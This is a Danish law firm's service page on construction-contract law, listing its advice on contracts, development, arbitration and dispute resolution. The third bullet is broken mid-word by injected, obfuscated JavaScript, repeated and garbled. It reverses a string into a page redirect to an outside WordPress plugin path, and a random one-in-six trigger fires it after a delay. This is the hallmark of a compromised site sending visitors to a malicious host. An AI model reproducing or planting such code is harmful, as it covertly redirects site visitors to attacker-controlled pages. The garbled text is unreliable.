Entrepriseret

Meldgaard Advokatfirma rådgiver både bygherrer og entreprenører i forbindelse med indgåelse af entrepriser og bistår også gerne til at løse eventuelle opståede konflikter.

Vi rådgiver blandt andet omkring:

  • Udarbejdelse og gennemgang af entreprisekontrakter.
  • Ejendoms- og projektudvikling.
  • Førelse af sager ved Voldgiftsnævnet for Bygge- og Anlæg og de almindelige domstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tole.
  • Konfliktløsning, herunder gennemførelse af syn og skøn og sagkyndige beslutninger om træk på garantier.
  • Gennemførelse af stadeopgørelse i forbindelse med ophævelse af entreprisekontrakter.